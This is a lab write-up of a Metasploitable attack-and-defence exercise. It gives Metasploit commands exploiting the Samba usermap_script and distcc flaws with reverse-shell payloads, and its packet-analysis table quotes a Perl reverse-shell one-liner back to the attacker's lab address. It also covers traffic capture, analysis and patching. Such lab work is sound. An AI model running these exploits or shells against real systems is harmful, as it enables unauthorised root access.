Linux operating system security protection

Linux system attack and defense confrontation practice

1. Practical content

• Find a penetration attack module for Linux system services in the Metasploit penetration attack framework software, and deploy a vulnerable environment in the network security attack and defense experimental environment (such as penetration of third-party network services, you need to find and install a version with specific vulnerabilities), And use metasploit to attack.

• The attacker uses the Metasploit penetration software to carry out network attacks against the Linux Metasploitable target machine, and the defender uses Tcpdump, Wireshark or Snort tool on the Metasploitble to capture the attack flow, and analyzes which security vulnerability the attacker exploits to attack, download from the official website The security vulnerability patch is systematically patched, and the two parties cooperate to give a report on the attack and defense process.

  2. Experimental environment

• In order to complete this experiment, we deployed the following experimental environment.
• The offensive and defensive sides use two laptops and connect them directly into a local area network. The Vmware Workstation software is deployed on the laptops of the offensive and defensive sides, and the attack aircraft, scanner and defense aircraft are established respectively. The attacker uses the BackTrack4 system and uses WinXPattacker for scanning; the defender uses the Ubuntu 8.04-Metasploitable system.

• As shown in the figure below, the three virtual machines use Bridge to connect to the Internet. The IP address of the attacking machine is 192.168.200.10, the IP address of the scanning machine is 192.168.200.2, and the IP address of the defending machine is 192.168.200.11.

3. Offensive and defensive practice process

• The offensive and defensive sides first start the virtual machine, configure the network environment and test the smoothness of the network, and then perform the next operations respectively.

  Attacking process

  Vulnerability scan and result analysis

• In order to confirm the vulnerabilities of the defender's system, the attacker used X-Scan3.3 on the scanner to conduct a comprehensive vulnerability scan on the defender.

• Among them, the services and specific loopholes opened by the defense machine are as follows:

• View the detailed scan report, you can learn a lot of important information about the host,
• a) The hostname of the system can be obtained from port 139 "METASPLOITABLE", and the comment "metasploitable server (Samba 3.0.20-Debian)";
• b) There are many users in the host system, a total of 35, of which 33 are prohibited, and the users user and msfadmin are used for survival;
• c) There is a weak password in the system. The user and msfadmin passwords are the same as the user name. The net use command can be used to establish a connection to view the shared resources. ftp open version information ProFTPD 1.3.1 Server (Debian), user can also be used in ftp;
• d) The telnet service is open, and it can be determined that the system is Ubuntu 8.04. Users user and msfadmin can log in and obtain corresponding permissions. If there is no weak password, the user's password can also be obtained by intercepting the telnet data.

choice of attack

• According to the above analysis results, the simplest attack method is to log in with the user or msfadmin user through telnet, but this kind of attack is not our experimental purpose, so we temporarily ignore the problem of weak system passwords and use the vulnerabilities of third-party software. Gain control of the system.

From the above vulnerability scan, we can see that there are many vulnerabilities in the defense machine. We can use SMB vulnerabilities, distcc vulnerabilities, etc. to attack. Because SMB is a service of Samba software, and the Samba service runs under root privileges, once the attack is successful, a shell with root privileges will be obtained. In this experiment, we mainly use the SMB vulnerability to attack, and try to use the distcc vulnerability.

attack intrusion

• After completing the above analysis, we finally entered today's main event, the attack link.
• Enter the command in the command line window
• msfconsole
• Will open the attack tool we want to use: metasploit, as shown below,

• First, we use the SMB vulnerability to attack the defense machine, and set the payload to reverse (if there is no firewall, it is possible to select any shell payload, the payload of this experiment is arbitrarily selected), and enter the following commands in turn , use the SMB vulnerability to attack the defender,

use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

• As shown in the figure below, after the attack, a shell with root privileges was successfully obtained, and the attack was successful!

• Disconnect the current connection, enter the following commands in turn, and use the distcc vulnerability to attack.

back
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

As shown in the figure below, a shell that can be used will appear after the attack is successful, but without root privileges.

But there was no response when continuing to enter the command, and it was later confirmed that it was interrupted artificially by the defender.
In order to use higher-privileged commands, we need a root-privileged shell. Therefore, the SMB vulnerability is used again to attack. Enter the following command on the command line,

back
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

• Then enter the reboot command in the obtained shell, as shown below,

• At this time, the defense machine system restarted, and the attack was successful!

defensive process

• Signs of attack observed on defending aircraft
• Immediately after the defense machine is started, use the following commands to capture the packets received and sent by the system, and save the results to the result.cap file.

sudo tcpdump –s 00 –w result.cap &

• Then after waiting for a while, use the following command to view the system process,

ps –e | more

• Several suspicious telnet processes were found, which were later confirmed to be the shells used in the attack. As shown below,

• Kill the telnet process decisively. But soon after, a message from user root was received, and the machine rebooted...

Packet Analysis

• To figure out the real reason for the reboot. When the machine restarts, the network is disconnected decisively. Export the captured message file and analyze it with wireshark.
• Simply check the captured packets, in just 30 minutes, there are a total of 128768 packets. In such a huge amount of packets, most of the packets are packets of the same protocol in fragments, as shown in the figure below.

Therefore, it can be concluded that the attack aircraft is scanning, and the real attack should be at the end. Looking at the content of the message from the back to the front, it is found that the penultimate message is a TCP data packet, and the content of the message is exactly reboot! It can be concluded that this command caused the system to restart.

After careful analysis of the packets, it can be determined that there are three attacks, as shown in the following figure, in which the vulnerability of the attack and the attack script carried are:

Vulnerability name	Related URLs	attack script	command executed
SMB Vulnerability CVE-2007-2447	http://www.samba.org/samba/security/CVE-2007-2447.html	nohup sh -c ‘(sleep 4495	telnet 192.168.200.10 4444
Distcc Vulnerability CVE-2004-2687	http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687	perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.200.10:4444”);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’	idusers
same as the first	same as the first	same as the first	idreboot

Bugfix

• Since the defense machine is an ubuntu system, it is easy to upgrade the software to the latest version. Execute the following command on the command line,

sudo apt-get update
sudo apt-get install samba

• Or disable the corresponding service,

sudo /etc/init.d/samba stop
sudo /etc/init.d/distcc stop

• However, when you upgrade distcc, you will be prompted that there is no updated version. Go to its official website to download the latest version, uninstall the old version and install it to patch the vulnerability.

4. Summary of Offensive and Defensive Practices

Problems encountered in practice and summed up experience,

• Attacking side
• a) Vulnerability selection, because there are documents that point out the vulnerabilities of the Metasploitable target machine, so in this direction, the vulnerabilities attempted in the attack process can be reduced;
• b) If the obtained shell permissions are not at the root level, you need to continue to use local overflow to escalate permissions. I have very little information on these vulnerabilities.
• defender
• a) The number of captured packets is huge, and it is difficult to find useful information from them.
• b) Inferring the exploited vulnerabilities from the attacking process must have considerable background knowledge and be proficient in using search engines and official websites.